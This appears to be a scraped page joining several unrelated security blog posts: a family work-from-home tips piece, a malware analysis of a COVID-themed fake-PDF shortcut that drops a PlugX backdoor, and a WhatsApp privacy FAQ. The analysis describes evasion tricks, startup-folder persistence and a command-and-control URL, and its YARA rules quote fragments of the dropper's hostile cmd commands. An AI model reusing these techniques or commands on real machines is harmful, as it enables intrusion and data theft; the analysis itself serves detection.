Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think its a hassle, consider the simplicity of a password manager. Using a password manager will make changing passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them with the same value.

It’s a new frontier parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

Fake Coronavirus tracking app exploiting our fear and vulnerable social situation

As the Coronavirus spreads across countries creating fear across the globe, everybody wants to stay on top of any information related to it wanting to remain safe and away from infected people. Malware authors are also taking advantage of this situation. Previously on the Android Playstore, there were many  applications present which claimed…

Is APT27 Abusing COVID-19 To Attack People ?!

Scenario

We are living hard time, many countries all around the world are hit by COVID-19 which happened to be a very dangerous disease. Unfortunately many deaths, thousands of infected people, few breathing equipment, stock burned Billion of dollars and a lot of companies are entering into a economic and financial crisis. Governments are doing their best to mitigate such a virus while people are stuck home working remotely using their own equipment.

In that scenario, jackals are luring people using every dirty way to attack their private devices. At home it’s hard to have advanced protection systems as we have in companies. For example it’s hard to have Intrusion Prevention Systems, proxies, advanced threat protection, automated sandbox and again advanced end-point protections letting personal devices more vulnerable to be attacked. In this reality ruthless attackers abuse of this situation to attack digitally unprotected people.

Today many reports are describing how infamous attackers are abusing such an emergency time to lure people by sending thematic email campaign or by using thematic IM within Malware or Phishing links. Following few of them that I believe would be a nice reading:

Today I want to contribute to such a blog-roll analyzing a new spreading variant that hit my observatory. I want to “spoil” the conclusions now, but it’s getting pretty sad if an APT group makes use of its knowledge to take advance from today’s situation.

Stage 1

The first stage is a fake PDF file. It looks like a real PDF, it has a hidden extension and a nice PDF icon, but it really isn’t a PDF, it’s actually a .lnk file, or in other words a “Microsoft Linking File”.

Sha25695489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8
ThreatDropper and Execution
Ssdeep24576:2D9JuasgfxPmNirQ2dRqZJuH3eBf9mddWoX+KIKoIkVrI:2DzuOxPm0iZLKIKRkq
DescriptionFake PDF file used to run initial infection chain

Opening up the .lnk file we might appreciate a weird linking pattern. Two main sections: one is a kind of header where it is possible to observe commands, and the other section is a big encoded payload.

.lnk file

Once beautified the first section it looks easier to understand what it does. It basically copies itself into a temporary folder (through cmd.exe), it extracts bytes from its body (from section two), it decodes such a bytes from Byte64 (through msoia.exe ) and it places the extracted content into the temporary user folder. It deflates the content (through expand) and it finally it executes a javascript file (through wscript) which was included into the compressed content. The following image shows the beautified code section of the analyzed file.

Beautified .lnk file

It is quite nice to see how the attacker copied certutils from local system, by using (*ertu*.exe) in order to avoid command line detection from public sandboxes. Indeed many sandboxes have signatures on certutils, since it’s quite a notorious tool used by some attackers, so that avoiding the behavior signature match it would take a lower score from public sandboxes.

Stage 2

Stage 1 carved Stage 2 from its body by extracting bytes and decoding them using base64 encoding. The new stage is a Microsoft compressed CAB file described in the following table.

Sha256f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9
ThreatMalware Carrier/Packer/Compressor
Ssdeep24576:CkL6X/3PSCuflrdNZ4J00ZcmNh3wsAR36Mge:vLK/fS200ZcYh3kqpe
DescriptionMicrosoft CAB bringing contents

Extracting files from Microsoft CAB we observe 6 more files entering in the battlefield:

  • 20200308-sitrep-48-covid-19.pdf. The original PDF from WHO explaining the COVID-19 status and how to fight it.
  • 3UDBUTNY7YstRc.tmp. PE32 Executable file (DLL)
  • 486AULMsOPmf6W.tmp. PE32 Executable (GUI)
  • 9sOXN6Ltf0afe7.js. Javascript file (called by .lnk)
  • cSi1r0uywDNvDu.tmp. XSL StyleSheet Document
  • MiZl5xsDRylf0W.tmp. Text file including PE32 file

Stage 1 executes the Javascript included in the CAB file. 9sOXN6Ltf0afe7.js performs an ActiveXObject call to WScript.Shell in order to execute Windows command lists. Once” deobfuscated” and beautified the command line looks like the following (9sOXN6Ltf0afe7.js payload beautified) . The attacker creates a folder that looks like a “file” by calling it cscript.exe trying to cheat the analyst. Then the attacker populates that folder with the needed files to follow the infection chain.

9sOXN6Ltf0afe7.js payload “deobfuscated”

A special thought goes to WINRM.VBS which helped the attacker to execute Signed Script Proxy Execution (T1216). According to Microsoft: “WINRM is the CLI interface to our WS-MGMT protocol. The neat thing about this is that you can call it from PowerShell to manage remote systems that don’t have PowerShell installed on them (including Server Core systems and Raw hardware).” The attacker also places a file called Wordcnvpxy.exe on the OFFICE12 folder. We will analyze it in a few steps but at that stage we might observe that is the “last call” before luring the victim by showing the good PDF file (also included in the CAB). But according with 9sOXN6Ltf0afe7.js the first run is on WsmPty.xsl which is the renamed version of cSi1r0uywDNvDu.tmp.

Stage 3

Stage 3 is run by stage 2 and it is a XSL (StleSheet Office file) wrapping a VBScript object.

Sha2569d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc
ThreatPayload Extractor and Command Executor
Ssdeep96:46Pdv3fOYCeeapSCDIKufYS2VGsBu746WJCSmCZyAcGghF:fh3fOYneaLDIgnNEFCZyAcGsF,
DescriptionDecode Additional Stage by using coding charsets and XOR

The following VBScript is run through cscript.exe, It’s an obfuscated and xor-encrypted payload. The encryption is performed by a simple xor having as key the single byte 0 while the encoding procedure is a multi conversion routine which could be summarized as follows:

chr(asc(chr(“&h”&mid(x,y,2))))

VBScript Stage3

The attacker tried to confuse the analyst by reusing variable names in private or local contexts, but after a couple of minutes, you might eventually come out with the following decryption loop.

Decryption Loop

If you run it against the embedded payload you will eventually see a new stage: Stage 4. A brand new script targeting old version of MSOffice.

Stage 4

Stage 4 is decoded and run by Stage 3. That stage runs an attacker version of MSOSTYLE.exe copied from Stage 2. It hijacks method on an old office 2007 component (Office Data Provider for – MSOSTYLE.exe).

Sha3567f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0
ThreatPersistence and Execution
Ssdeep48:zKxYaDzzXRrVHyMqHeIyJwlLGvTlGrbaTFGNT93TPTxGVhTG6TWWWsKj390C9nEm:zKxjDRt+e1sGvJG3aRGNNDtGLLqP5j3N
DescriptionSet persistence on the target system (Script File)

The following image shows the decrypted and decoded Stage. It’s quite clear the attacker wants to get persistence on the target machine and to run additional payload by abusing MSOSTYLE.exe (old component) placed in the “right folder” from stage 2. The persistence is guaranteed by adding a link called Accessories.lnk inside the startup windows folder pointing to: MiZl5xsDRylf0W.tmp.

Powershell Stage 4

Stage 5

Stage 5 is activated by Stage 2 but only after the execution of Stage 3 and Stage 4. Stage 5 is a multi-step session composed by the following additional artifacts: (i) 3UDBUTNY7YstRc.tmp renamed by Stage 2 into OINFO12.OCX and (ii) MiZl5xsDRylf0W.tmp renamed by Stage 2 into Wordcnvpxy.exe . Every single artifact is available after the execution of Stage 2 into the crafted folder called: OFFICE12 from the user home.

Sha256604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d
ThreatRemote Control, depending on usage
Ssdeep536:/4yuzgQ5WugrQ+SccIp1t4xO67y5qHae:gyuzgKwr9bB1t4xO67y5j,
DescriptionOffice Data Provider for WBEM, not malicious but accountable.

MSOSTYLE.EXE is an old Microsoft Office Data Provider for WBEM. Web-Based Enterprise Management (WBEM) comprises a set of systems-management technologies developed to unify the management of distributed computing environments. So it could not be considered malicious, but it could be considered accountable of the entire infection chain.

Sha256a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e
ThreatPlugX, Command Execution
Ssdeed768:jxmCQWD+TAxTRh40XfEDDnFt4AczonsT:MC5bw+zosT
DescriptionA runner plus Command Execution, Pluging Manager

At the time of writing only three AVs detect OINFO12.OCX as a malicious file. Rising AV is actually the only company which attributes it to a well-known PlugX sample. According with Trend Micro, the PlugX malware family is well known to researchers having samples dating back to as early as 2008. PlugX is a fully featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote cmd.exe shell.

OINFO12.OCX VT coverage

Taking it on static analysis it will expose three callable functions: DeleteOfficeData (0x10001020), GetOfficeData (0x10001000) and EntryPoint 0x100015ac).

Both of the methods DeleteOfficeData and GetOfficeData looks like recalling a classic method to hijacking old Office Parser (take a look to here and figure 3 in here ) to execute commands.

DeleteOfficeData (0x10001020)
GetOfficeData (0x10001000)

Indeed if run from its Entry Point, the DLL executes Wordcnvpxy.exe (as it is the default plugin component). The executable DLL must be in the same path of Wordcnvpxy.exe and it needs to have such a filename (imposed by Stage 2 and hardcoded into the library). On the other side of the coin if commands are passed through stdin, it executes the given parameters as commands.

No Input Commands, Wordcnvpxy execution

The following image shows when parameters are given and Commands are executed.

Commands Execution

Finally we have Wordcnvpxy.exe which is run in the same stage (Stage 5) by OINFO12.OCX . At the time of writing, it is well-known from static engines, it looks like a standard backdoor beacon-ing to own command and control installed as PlugX module.

Sha256002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124
ThreatPlugX, Backdoor
Ssdeep1536:9/dlJMLIU94EYayTdHP6rUkn16O41yWCzB:93JsZxePUAFgWCz
DescriptionProbably one of the last stages, beaconing VS C2 and executing external commands
Wordcnvpxy VT coverage

The sample uses dynamic function loading avoiding static enumeration and guessing. It grabs information on the victim, PC-name, username, IP-location and send them to C2 as a first beacon.

Dynamic Loading function calls

The used Command and Control resolves to the following URL hxxp://motivation[.]neighboring[.]site/01/index.php

Command and Control

Unfortunately the attacker has shut down everything few hours after I started my analysis, so that I do not have more information about network, commands and additional Plugins. However the overall structure reminds me PlugX RAT as nicely described here.

Attribution

According to MITRE (BTW thank you @Arkbird_SOLG for the great suggestions on attribution) PlugX is a well known RAT attributed to China’s APT. APT27 (aka Emissary Panda) are the mostly notable APT group that used it. Moreover (thanks to @Arkbird_SOLG) “[…] on China culture, hijacking method are a mandatory knowledge for a job like pentesting […]” which could enforce the theory of APT27

UPDATE: I am aware that PlugX is today an opensource RAT, and I am aware that this is not enough for attribution. Indeed the intent of the title is to put doubts on that attribution by the usage of “?” (question mark). On one hand PlugX historically has been attributed to APT27 but on the other hand it’s public. So it’s hard to say Yes or Not, for such a reason the intent of this blog post is: Is APT27 Abusing COVID-19 To Attack People ?!. It’s an Open question not a position.

We all are passing a bad time. COVID-19 caused many death and is threatening entire economies. Please, even if you are an attacker and you gain profit from you infamous job, stop cyber attacks against peoples that are suffering this pandemic and rest. Ethics and compassion should be alive – even behind you monitors.

IoC

  • 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8 (original .lnk)
  • f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9 (Stage 2)
  • 9d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc (Stage 3)
  • 7f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0 (Stage 4)
  • a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e (Stage 5/a)
  • 002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124 (Stage 5/b)
  • hxxp://motivation[.]neighboring[.]site/01/index.php (C2)

Yara (auto)

import "pe"

rule MiZl5xsDRylf0W {
   meta:
      description = "yara - file MiZl5xsDRylf0W.tmp"
      date = "2020-03-17"
      hash1 = "b578a237587054f351f71bd41bede49197f77a1409176f839ebde105f3aee44c"
   strings:
      $s1 = "%ls\\%S.exe" fullword wide
      $s2 = "%XFTpX7m5ZvRCkEg" fullword ascii
      $s3 = "SK_Parasite, Version 1.0" fullword wide
      $s4 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPAD" ascii
      $s5 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD" fullword ascii
      $s6 = "SKPARASITE" fullword wide
      $s7 = "default" fullword ascii /* Goodware String - occured 709 times */
      $s8 = "59xf4qy-YXn-pkuXh=x3CXPHCcs3dXFlCtr3Cc4H4XufdZjmAZe3Ccxuibvm592g" fullword ascii
      $s9 = "SK_Parasite" fullword wide
      $s10 = "KOeS5OEThZjnYazMJ7p3Ccx-ptAMKuUMLlPEID2=Kn4XLqTM4WhSAKAHAbRMxXsa5Xj-AazEAqzEAqgg" fullword ascii
      $s11 = "ZXsDCcsTA80HdkET" fullword ascii
      $s12 = "8c9h9q9" fullword ascii /* Goodware String - occured 1 times */
      $s13 = "<&<,<6<<<F<O<Z<_<h<r<}<" fullword ascii /* Goodware String - occured 1 times */
      $s14 = "5$5@5\\5`5" fullword ascii /* Goodware String - occured 1 times */
      $s15 = "About SK_Parasite" fullword wide
      $s16 = "1/2A2o2" fullword ascii /* Goodware String - occured 1 times */
      $s17 = "z2bqw7k90rJYALIQUxZK%sO=hd5C4piVMFlaRucWy31GTNH-mED8fnXtPvSojeB6g" fullword ascii
      $s18 = "PQQQQQQWQf" fullword ascii
      $s19 = "Copyright (C) 2020" fullword wide
      $s20 = "1)1p1z1" fullword ascii /* Goodware String - occured 1 times */
   condition:
      uint16(0) == 0x0300 and filesize < 200KB and
      8 of them
}

rule sig_9sOXN6Ltf0afe7 {
   meta:
      description = "yara - file 9sOXN6Ltf0afe7.js"
      date = "2020-03-17"
      hash1 = "70b8397f87e4a0d235d41b00a980a8be9743691318d30293f7aa6044284ffc9c"
   strings:
      $x1 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x2 = "&for /r C:\\\\Windows\\\\System32\\\\ %m in (cscr*.exe) do copy %m %tmp%\\\\cscript.exe\\\\msproof.exe /y&move /Y %tmp%\\\\cSi1r" ascii
      $x3 = "ss?Handle=4 -format:pretty&del \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /f /q&ping -n 1 127.0.0.1&move /Y %tmp%\\\\48" ascii
      $x4 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x5 = "p %tmp%\\\\cscript.exe\\\\WsmPty.xsl&%tmp%\\\\cscript.exe\\\\msproof.exe //nologo %windir%\\\\System32\\\\winrm.vbs get wmicimv2" ascii
      $s6 = "/b %tmp%\\\\2m7EBxdH3wHwBO.tmp+%tmp%\\\\MiZl5xsDRylf0W.tmp \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /Y&\\\"%tmp%\\\\2" ascii
      $s7 = "6W.tmp \\\"%userprofile%\\\\OFFICE12\\\\MSOSTYLE.EXE\\\"&move /Y %tmp%\\\\3UDBUTNY7YstRc.tmp \\\"%userprofile%\\\\OFFICE12\\\\OI" ascii
      $s8 = "48-covid-19.pdf\\\"\",0);" fullword ascii
      $s9 = "e7926b8de13327f8e703624e" ascii
   condition:
      uint16(0) == 0x6176 and filesize < 2KB and
      1 of ($x*) and all of them
}

rule sig_3UDBUTNY7YstRc {
   meta:
      description = "yara - file 3UDBUTNY7YstRc.tmp"
      date = "2020-03-17"
      hash1 = "a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e"
   strings:
      $x1 = "cmd /c notepad.exe" fullword ascii
      $x2 = "dllexec.dll" fullword ascii
      $s3 = "cmd /c calc.exe" fullword ascii
      $s4 = "Wordcnvpxy.exe" fullword ascii
      $s5 = "GetOfficeData" fullword ascii
      $s6 = "273<3]3b3" fullword ascii /* Goodware String - occured 1 times */
      $s7 = "2>2K2W2_2g2s2" fullword ascii /* Goodware String - occured 1 times */
      $s8 = "uTVWhY#" fullword ascii
      $s9 = "DeleteOfficeData" fullword ascii
      $s10 = "9#:=:N:" fullword ascii /* Goodware String - occured 1 times */
      $s11 = "URPQQhpB" fullword ascii
      $s12 = "6#6*626:6B6N6W6\\6b6l6u6" fullword ascii /* Goodware String - occured 2 times */
      $s13 = "0#0-030I0N0V0\\0c0i0p0v0~0" fullword ascii
      $s14 = "4.464<4F4L4V4\\4f4o4z4" fullword ascii
      $s15 = "<$=1=;=I=R=\\=" fullword ascii
      $s16 = ">->3>9>O>g>" fullword ascii
      $s17 = "5r5L6T6l6" fullword ascii
      $s18 = "1#1*191>1D1M1m1s1" fullword ascii
      $s19 = ":%:K:Q:{:" fullword ascii
      $s20 = "5(5L5X5\\5`5d5h5" fullword ascii /* Goodware String - occured 4 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and
      ( pe.imphash() == "abba83cce6a959dc431917a65c5fe7ca" and ( pe.exports("DeleteOfficeData") and pe.exports("GetOfficeData") ) or ( 1 of ($x*) or 4 of them ) )
}

rule sig_20200308_sitrep_48_covid_19________pdf {
   meta:
      description = "yara - file 20200308-sitrep-48-covid-19.pdf.lnk"
      date = "2020-03-17"
      hash1 = "d54d85e3044a05bdafee9f30f7604ee584db91944a5149cc9e0f65f381d85492"
   strings:
      $x1 = "TVNDRgAAAADWPw0AAAAAAEwAAAAAAAAAAwEFAAYAAACtJwAAKgEAABsAAQAT6QsAAgABAC5lDAADAAEARvcMAAEAAQBbOA0AAQABABUTDQAAAAAAAABpUJOkIAAyMDIw" ascii
      $s2 = "jS61LWA3O0LZjbyOyM+Th5BHkL/6NtKERZApZAvWg3QiB7HuGbdfdfIMVwXLDLL9nVOdKplM1TlFlO5ESifhf5tgzpqP9DZt2dfrfTPS/+ZIBLzWJ99g9xXWv91bOiOD" ascii
      $s3 = "wXEkU5x/pIsmFrJtNHbdwG+bszpTRFThzR7p/shOst0DW0ZFKeRdhc/kM7yZKiZM0LkwrconqjQ3wYPZ7MTqq6M91IEWmt0TYiRCrUlVHk0W63x4OVNkZBjH3umhhGbW" ascii
      $s4 = "pUnp5YF5MVzpQVVZGZ3vjyftPMSfwPbgfq+oOoRAAyP6ZnheN9Or9fx8glHHDnXKm8PTjPiuhWhq74VNkEWr+gACxYi/wwj+yrQNyWULOGigcjQQ6ze7Zgp48Bny4X8v" ascii
      $s5 = "1WxCb+ZUBMNpgdQ9VM6Pbm/a3lOho1gNxYjJoenk4InBUmvbgaGreBVEPcshY3J0VUdR35An5FULDqPNKxb5raGeTLpm5548XATYLogWT8E22FhAi+V4d0q3ck1gZSqw" ascii
      $s6 = "GEeEP7OJ3H9kNW2EPOUbKglcK2+vp//RmYt0D/CDulYi6iBikEye9CzxoMuCHgaF8hfJC8DaiQG6B/+lrCggdq54tM4fP9SAqhqBWxW1YVMoKHKrLKhWRlMhlYtoUDbV" ascii
      $s7 = "H/sC8wh3rLxj+gB3VC89yuytzdbGEK3P9U2mmfZGvCPYQlBQgXUXRc8UuNfknuIxjz3CsTDq0QPYPvLj9sHAaK6EoZ3tzZGNYDZBV1szVLoGm4wtS68/jiqvVtmPtKB6" ascii
      $s8 = "fauCRyQIlXVt+r5GYoBBBlfOQqImEkWo6+WlQTSwYS6smIFGhlOgf7AQ4ovS1utu5CdOQaEjc8UwcEx752927tdeRp8xVz4LlZVh/2KEKumMtVfbk1vucomNeqcRsJi6" ascii
      $s9 = "yd2OnvWZvuUQw3aLFzorH9uYxOItXtCmdMmUJP9GKGsdR2VRmYbpkfJ9I5JlbjB2nR28vsrlyOLvHeftPpJaqAb2+eY3ks7r6ewL6JeeS12Gw+8/OrnmTiIrWapEgObL" ascii
      $s10 = "RhSzuRlKjfLOgyDj4lOfKOsiZNdxLSHCfbS/kEYl0BslYnQ7YtwYOHZlbWNtSdEUhvb4kKsY/+AobmfLilpGotYo3vEBKu8hhbFE1Jrc+GYGxDRue6300wqLbdIKezBr" ascii
      $s11 = "cFHaggy5a+rMrMKC4rKmWdNudM/QWEwp2clOa3lRns1Y4qmtaE5STCmdnj+hITcnvc5eyekbDY568+RUHAxtOr8y3S/vmt9OfY7y/dLNNNLQofyTgt4T7G3abUZ1bNG1" ascii
      $s12 = "VjEg4DubcQ2BtwOwevQAyxdM/FzIuPehNRKJnyLk8q2jPd+UucexECuRJKkRJ0NnnGBEv7sjLuODcKIJHEX8JgyVAcq/DoPewYcsHY8Rh9NeC2fnR6OLLctWM2n53KUn" ascii
      $s13 = "nS8AHUkUzud+yCzW6SCpcW1LiQEWsA8B0zucbgdLVskYWhOLinfePmJ6k6CUgOpcd8fVzMTGRbjV6YyhJjWxlOGgyp7v+q5MGCVbXGwpGM/1xk73XpXhTTPABA+Atm1v" ascii
      $s14 = "KeyEC9M1uHqOE/KCRd902gmpYSK9Ep1sCtzpOqSfNfLHLGoTxu3zjMaEjJ8Dw4/VNYHZo4t5c2CPkSZskDGEYG9rz8HeDf4+Hd3t7y/CyEFD89WV2zsspTFMHnSiyp3t" ascii
      $s15 = "CcCdVZZhyydWDx5BFEKNrLqFB/YFtIaCbuk52NxcwOWQ4muYqVQDbXvcIi/mrR2bXPO1koVLNJbK28cDGFSGXFGg9YXl+YxZkEYe14fqauAf3E/rZcpNs5kCKmv5y5W4" ascii
      $s16 = "cnhkpPaBto41NCLi/eWl360SSHxRUUZsmZ2dnY3wlvb2T+Nu2mRSpYtAlikPNxFZa8nOIodAkeyEVi1SsSRQngbhvRq5LpJOPh4ldQ1N+56agooQr+W0oFa2KXNsEetV" ascii
      $s17 = "FIwtpdre2Wmnc21tda09FKpZefVL43grfymCTd5K56sLOgontwiwYn1nYgVnGJPP/LVQ4JKa1rFFA3Y0HSBBKwuTrFmOAdIJwhoTUrZzBokdMSD931UQuVHTXaMnRz10" ascii
      $s18 = "VGO9VokrQADVECqvw3oyurkmSN5/sSpYnNf7Wi/ECAUmGg/S5qDAyFTPbyfhqOI58HyFRC846KnQDdn72pSAno4kdaeMLOelzq3b6bXV5l2VPj4wQfNl0GZCuJMn7LTR" ascii
      $s19 = "TXxf/IllO3bWzFUJaAMLlRUnogcNa2x0VENzHR6cEaOx79lHSoQxYVHwSUfmEjZoZ2pROh7H1UCMdmJR/3wD2YF9x4MoF5dJQiiAhb4NH9781LGhwW6JqODySrvw3EGT" ascii
      $s20 = "lTvLNEAvdSOFqYwbinqsSVNmUDf6zYKeYafaDjqm8gebMsHURHBynktlSzDsefxSefP1Q1h15TkkR3m/j6/umso0tMFngezzB4SUvUoqb1BMzfPSHU+4EpvSvStNQjKe" ascii
   condition:
      uint16(0) == 0x5654 and filesize < 3000KB and
      1 of ($x*) and 4 of them
}

rule sig_486AULMsOPmf6W {
   meta:
      description = "yara - file 486AULMsOPmf6W.tmp"
      date = "2020-03-17"
      hash1 = "604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d"
   strings:
      $x1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s2 = "emblyIdentity type=\"win32\" name=\"Microsoft.VC80.CRT\" version=\"8.0.50608.0\" processorArchitecture=\"x86\" publicKeyToken=\"" ascii
      $s3 = "0Mscoree.dll" fullword ascii
      $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s5 = "t:\\misc\\x86\\ship\\0\\oinfop12.pdb" fullword ascii
      $s6 = "_tWinMain (Ship) commandline='%s'" fullword ascii
      $s7 = "PrintPostScriptOverText" fullword wide
      $s8 = "InstallLang" fullword wide /* base64 encoded string '"{-jYKjx' */
      $s9 = "re=\"X86\" name=\"OINFOP12.EXE\" type=\"win32\"></assemblyIdentity><description>OInfo</description><dependency><dependentAssembl" ascii
      $s10 = "SetOfficeProperties -- PublisherPageSetupType" fullword ascii
      $s11 = "\\ship\\0\\oinfop12.exe\\bbtopt\\oinfop12O.pdb" fullword ascii
      $s12 = "GetOffice type for '%S'" fullword ascii
      $s13 = "TemplateCount" fullword wide
      $s14 = "Win32_Word12Template" fullword wide
      $s15 = "'OInfoP12.EXE'" fullword ascii
      $s16 = "Queued_EventDescription= " fullword wide
      $s17 = "COfficeObj::Initialize, user='%S', namespace='%S'" fullword ascii
      $s18 = "TabIndentKey" fullword wide
      $s19 = "Win32_WebConnectionErrorMessage" fullword wide
      $s20 = "OInfo12.OCX" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 300KB and
      ( pe.imphash() == "3765c96e932e41e0de2bd2ed71ef99ad" or ( 1 of ($x*) or 4 of them ) )
}

WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private?

WhatsApp hacks

WhatsApp one of the largest instant messengers and considered by many a social network of its own. So, in continuing our app safety discussion, we’re diving into some of the top security hacks and questions many WhatsApp app users and parents may have.

But first, what’s a security hack? In short, it’s an attempt to exploit the weaknesses in an app, network, or digital service to gain unauthorized access, usually for some illicit purpose. Here are just some of the concerns WhatsApp users may have and some suggestions on boosting security.

WhatsApp Hack FAQ

Are WhatsApp conversations private?

Yes — but there are exceptions. More than any other app, WhatsApp offers greater privacy thanks to end-to-end encryption that scrambles messages to ensure only you and the person you’re communicating with can read your messages or listen to your calls. Here’s the catch: WhatsApp messages (which include videos and photos) are vulnerable before they are encrypted and after they are decrypted if a hacker has managed to drop spyware on the phone. Spyware attacks on WhatsApp have already occurred. Safe Family Tip: No conversation shared between devices is ever 100% private. To increase your WhatsApp security, keep sensitive conversations and content offline, and keep your app updated. 

Can anyone read my deleted WhatsApp messages?

A WhatsApp user can access his or her own deleted messages via the chat backup function that automatically backs up all of your messages at 2 a.m. every day. WhatsApp users can delete a message by using the Delete for Everyone button within an hour after sending though it’s not foolproof. Here’s the catch: Anyone who receives the message before it’s deleted can take a screenshot of it. So, there’s no way to ensure regrettable content isn’t captured, archived, or shared. There are also third-party apps that will recall deleted messages shared by others. Another possibility is that a hacker can access old chats stored in an app user’s cloud. Safe Family Tip: Think carefully about sharing messages or content you may regret later.

Can WhatsApp messages be deleted permanently?

Even if a WhatsApp user decides to delete a message, it’s no guarantee of privacy since conversations are two-way, and the person on the receiving end may screenshot or save a copy of a chat, video, or photo. On the security side, you may delete a message and see it disappear, but WhatsApp still retains a “forensic trace of the chat” that can be used by hackers for mining data, according to reports. Safe Family Tip: For extra security, turn off backups in WhatsApp’s Settings.

WhatsApp hacksHow can I secure my WhatsApp?

It’s crucial when using WhatsApp (or any other app) to be aware of common scams, including malware, catfishing, job and money scams, spyware, and file jacking. To amplify security, turn on Security Notifications in Settings, which will send an alert if, for some reason, your security code changes. Other ways to boost security: Use two-step verification, never share your 6-digit SMS verification code, disable cloud back up, and set your profile to private. Safe Family Tip: Install comprehensive family security software and secure physical access to your phone or laptop with a facial, fingerprint, or a passcode ID. Don’t open (block, report) messages from strangers or spammers. Never share personal information with people you don’t know. 

How do I delete my WhatsApp account from another phone?

To delete a WhatsApp account go to > Settings > Account > Delete My Account. Deleting your account erases message history, removes you from groups, and deletes your backup data. According to WhatsApp, for users moving from one type of phone to another, such as from an iPhone to an Android, and keeping the same phone number, your account information stays intact, but you won’t be able to migrate messages across platforms. If you’re not keeping your number, you should delete WhatsApp from your old phone, download WhatsApp to your new phone, and verify your new phone number. Upgrading the same phone type will likely include options to migrate messages. Safe Family Tip: Before you give away or exchange an old phone, wipe it clean of all your data.

How do you know your WhatsApp is scanned?

WhatsApp users can easily sync devices by downloading the WhatsApp web app and activating it (Settings > WhatsApp Web/Desktop). Devices sync by scanning a QR code that appears on your laptop screen. You know your device is scanned when you see the green chat screen appear on your desktop. Safe Family Tip: It’s possible for a person with physical access to your desktop to scan your QR code and to gain account access. If you think someone has access to your account log out of all your active web sessions in WhatsApp on your mobile phone.

How long are WhatsApp messages stored?

According to WhatsApp, once a user’s messages are delivered, they are deleted from WhatsApp servers. This includes chats, photos, videos, voice messages, and files. Messages can still be stored on each individual’s device. Safe Family Tip: The moment you send any content online, it’s out of your control. The person or group on the receiving end can still store it on their device or to their cloud service. Never send risky content. 

How secure is WhatsApp?

There’s no doubt, end-to-end encryption makes it much more difficult for hackers to read WhatsApp messages. While WhatsApp is more secure than other messaging apps — but not 100% secure.

